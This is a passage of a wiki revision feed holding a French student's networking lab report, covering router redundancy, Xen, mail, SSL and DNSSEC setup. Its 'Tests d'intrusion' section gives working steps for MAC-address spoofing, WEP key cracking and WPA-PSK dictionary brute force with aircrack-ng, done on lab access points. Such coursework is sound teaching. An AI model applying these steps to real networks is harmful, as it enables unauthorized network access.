		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23166"/>
				<updated>2015-11-23T17:13:16Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;1&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;default&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation de site web par certificat&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM&lt;br /&gt;
Country Name (2 letter code) [AU]: FR&lt;br /&gt;
State or Province Name (full name) [Some-State]: Nord&lt;br /&gt;
Locality Name (eg, city) []: Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille&lt;br /&gt;
Organizational Unit Namec SSLCertificateChainFile.  (eg, section) []: &lt;br /&gt;
Common Name (eg, YOUR name) []: hunt3r.lol&lt;br /&gt;
Email Address []: admin@hunt3r.lol&lt;br /&gt;
A challenge password []: &lt;br /&gt;
An optional company name []:&lt;br /&gt;
Il me génère donc deux fichiers, le .csr et le .key&lt;br /&gt;
J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.&lt;br /&gt;
&lt;br /&gt;
Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)&lt;br /&gt;
Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.&lt;br /&gt;
Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.&lt;br /&gt;
Même chose pour les certificats intermédiaire.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je peux commencer alors la configuration d'apache2 avec mon certificat :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
vim default-ssl.conf&lt;br /&gt;
                SSLCertificateFile      /root/Werewolf.cer&lt;br /&gt;
                SSLCertificateKeyFile /root/Werewolf.key&lt;br /&gt;
                #SSLCertificateChainFile /root/WerewolfInter.cer&lt;br /&gt;
&lt;br /&gt;
3 commandes me permettent de mettre en route le tout :&lt;br /&gt;
a2ensite default-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Sécurisation de serveur DNS par DNSSEC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/bind&lt;br /&gt;
vim named.conf.options ==&amp;gt; rajout de l'option dnssec-enable yes;&lt;br /&gt;
mkdir hunt3r.dnssec&lt;br /&gt;
cd hunt3r.dnssec&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom hunt3r.dnssec&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom hunt3r.dnssec&lt;br /&gt;
Je renomme les fichiers créé en : &lt;br /&gt;
    *hunt3r-ksk.key&lt;br /&gt;
    *hunt3r-ksk.private&lt;br /&gt;
    *hunt3r-zsk.key&lt;br /&gt;
    *hunt3r-zsk.private&lt;br /&gt;
J'inclus dans le fichier db.hunt3r : &lt;br /&gt;
    *$include /etc/bind/hunt3r.dnssec/hunt3r-ksk.key&lt;br /&gt;
    *$include /etc/bind/hunt3r.dnssec/hunt3r-zsk.key&lt;br /&gt;
dnssec-signzone -o hunt3r.lol -k hunt3r-ksk ../db.hunter hunt3r-zsk&lt;br /&gt;
Modification du fichier named.conf.local  ==&amp;gt; db.hunt3r.signed&lt;br /&gt;
service bind9 restart&lt;br /&gt;
Copie de la clé KSK sur le site de gandi dans l'onglet gérer DNSSEC&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23164</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23164"/>
				<updated>2015-11-23T16:56:31Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;1&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;default&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
